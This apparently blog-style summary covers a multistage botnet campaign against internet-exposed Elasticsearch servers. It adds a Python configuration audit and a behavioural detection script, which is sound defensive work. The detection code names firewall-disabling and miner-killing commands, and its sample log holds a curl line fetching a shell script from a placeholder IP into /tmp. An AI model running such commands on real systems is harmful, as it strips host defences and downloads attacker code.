Recently a new cyberattack was added to the list of attacks on Elasticsearch, one that turns Elasticsearch databases into zombies or botnet nodes.
There is a long list of attacks conducted on Elasticsearch databases in the past few years. The new one raises more concern among security experts because of its complexity and its use of several tactics to evade security systems and carry the attack through successfully.
Elasticsearch is a popular tool that helps companies manage billions of records easily. Its source code is open, and large companies such as Netflix, Uber, Dell, and Adobe already use it. I hope you now have an idea of how attractive this tool is for hackers looking for vulnerabilities to exploit in order to gain control of systems.
Recently, Trend Micro, a cybersecurity company, revealed that hackers have targeted publicly accessible Elasticsearch databases by delivering a backdoor as the payload.
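The common thread in the attacks described here is an Elasticsearch instance reachable from the internet without authentication. The following is an added example (not code from the original post or from Trend Micro) of a small audit over the flat `key: value` settings in an `elasticsearch.yml`: it flags a `network.host` bound to a non-loopback interface and a missing or disabled `xpack.security.enabled`. The two configuration texts are constructed for the example; the parser is deliberately minimal and only handles the flat dotted-key style that file normally uses.

```python
# Assumed, minimal parser for flat "key: value" lines as found in elasticsearch.yml.
# It ignores comments and blank lines and does not handle nested YAML blocks.
def parse_flat_yaml(text):
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        key, _, value = line.partition(":")
        settings[key.strip()] = value.strip().strip('"').strip("'")
    return settings


# network.host values that bind the node to interfaces other than loopback.
PUBLIC_HOST_VALUES = {"0.0.0.0", "::", "_global_", "_site_"}
LOOPBACK_VALUES = {"_local_", "localhost", "127.0.0.1", "::1"}


def is_loopback(host):
    return host in LOOPBACK_VALUES or host.startswith("127.")


def audit_elasticsearch_config(text):
    """Return a list of human-readable findings; an empty list means no exposure found."""
    settings = parse_flat_yaml(text)
    findings = []

    # Elasticsearch defaults network.host to the loopback interface when unset.
    host = settings.get("network.host", "_local_")
    if host in PUBLIC_HOST_VALUES or not is_loopback(host):
        findings.append(f"network.host={host} binds the node to a non-loopback interface")

    # Older releases shipped with security off unless explicitly enabled, so treat
    # "unset" the same as "false" for the purpose of this audit (assumption).
    if settings.get("xpack.security.enabled", "false").lower() != "true":
        findings.append("xpack.security.enabled is not true: the REST API has no authentication")

    return findings


# Constructed sample configurations for the example (not taken from any real host).
EXPOSED_CONFIG = """
cluster.name: search-prod
network.host: 0.0.0.0      # listen on every interface
http.port: 9200
"""

HARDENED_CONFIG = """
cluster.name: search-prod
network.host: 127.0.0.1
http.port: 9200
xpack.security.enabled: true
"""

if __name__ == "__main__":
    for name, cfg in (("exposed", EXPOSED_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_elasticsearch_config(cfg) or "OK")
```

Run it against the two constructed configurations and the exposed one produces two findings while the hardened one produces none; in practice the same check belongs in a configuration-management test so a node never ships bound to `0.0.0.0` without authentication.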
The attack requires multiple scripts to be executed on the system, starting with disabling the system firewall and stopping all cryptocurrency mining processes already running on it. Once these tasks complete successfully, the hackers download another script to the server from a compromised or grey website.
If you are a blogger and wonder why bots keep trying to break into your blog, this is mostly why: hackers use compromised websites to stage large cyberattacks. But that is a topic for another day.
Even if the system detects and blocks the URL used to download the malicious script, the hackers can easily change that URL.
It is a profit-driven attack
This particular attack is profit-driven. In the first step the hackers stop the firewall, then kill any cryptocurrency mining processes already running so they can start their own.
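Because the download URL can be swapped at will, matching on the URL alone is a weak detection. The sequence of behaviours the post describes (firewall disabled, competing miners killed, a further script fetched) is harder for the attacker to change. The following is an added example, not code from the original post or from Trend Micro, of detection logic that reads command-audit log lines, assigns each command to one of those three stages, and flags hosts on which two or more stages appear. The log format, the field names and the sample lines are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed log format: one executed command per line (as a shell-audit or
# process-creation feed might emit). Fields and layout are assumptions.
LOG_RE = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) uid=(?P<uid>\d+) cmd="(?P<cmd>.*)"$')

# Behavioural stages taken from the attack description above. The patterns are
# illustrative, not an exhaustive signature set.
STAGE_PATTERNS = {
    "firewall_disabled": re.compile(r"\b(ufw disable|iptables -F|systemctl stop firewalld)\b"),
    "miner_killed": re.compile(r"\b(pkill|killall|kill -9)\b.*\bminer\b", re.IGNORECASE),
    "script_downloaded": re.compile(r"\b(curl|wget)\b.*https?://\S+\.sh\b"),
}


def parse_line(line):
    """Return the parsed fields of one log line, or None if it does not fit the format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(cmd):
    """Names of every stage whose pattern matches the command."""
    return [name for name, pat in STAGE_PATTERNS.items() if pat.search(cmd)]


def find_multistage_hosts(lines, min_stages=2):
    """Map host -> sorted stage names for hosts showing at least min_stages distinct stages.

    A single stage on its own (an admin flushing iptables, a deploy script
    fetched with wget) is routine; the combination is what the post calls a red flag.
    """
    stages_by_host = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed or unrelated lines rather than fail
        for stage in classify(rec["cmd"]):
            stages_by_host[rec["host"]].add(stage)
    return {h: sorted(s) for h, s in stages_by_host.items() if len(s) >= min_stages}


# Constructed sample log. The address 198.51.100.23 is from the documentation range
# reserved by RFC 5737 and is not a real indicator.
SAMPLE_LOG = [
    '2019-07-23T10:15:01Z host=es-node-1 uid=1001 cmd="ufw disable"',
    '2019-07-23T10:15:02Z host=es-node-1 uid=1001 cmd="pkill -f miner"',
    '2019-07-23T10:15:04Z host=es-node-1 uid=1001 cmd="curl -fsSL http://198.51.100.23/update.sh -o /tmp/u.sh"',
    '2019-07-23T10:20:00Z host=es-node-2 uid=1002 cmd="wget https://deploy.example.org/backup.sh"',
    '2019-07-23T10:21:00Z host=es-node-3 uid=0 cmd="iptables -F"',
    'this line is not in the expected format',
]

if __name__ == "__main__":
    for host, stages in find_multistage_hosts(SAMPLE_LOG).items():
        print(f"{host}: {', '.join(stages)}")
```

On the constructed sample only `es-node-1` is reported, with all three stages, while the single routine commands on the other two hosts stay below the threshold. The threshold and the patterns are the tuning knobs: a SOC would widen the patterns with what its own process-creation telemetry shows and might add a time window so the stages must occur close together.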
Trend Micro also detected malware named BillGates, which steals system information and can launch DDoS attacks. The BillGates malware was first encountered in 2014; you can read about it on Akamai's website.
The post also draws attention to how dangerous these techniques for evading detection and completing the task are. Trend Micro also mentions that such attacks could be a test run for a bigger cyberattack in the future.
"An attack that takes precautions to evade detection and uses multistage execution techniques is a red flag." (Trend Micro)
For a more detailed analysis of the attack, head over to the Trend Micro website. They have also provided images of the scripts and described what each script does.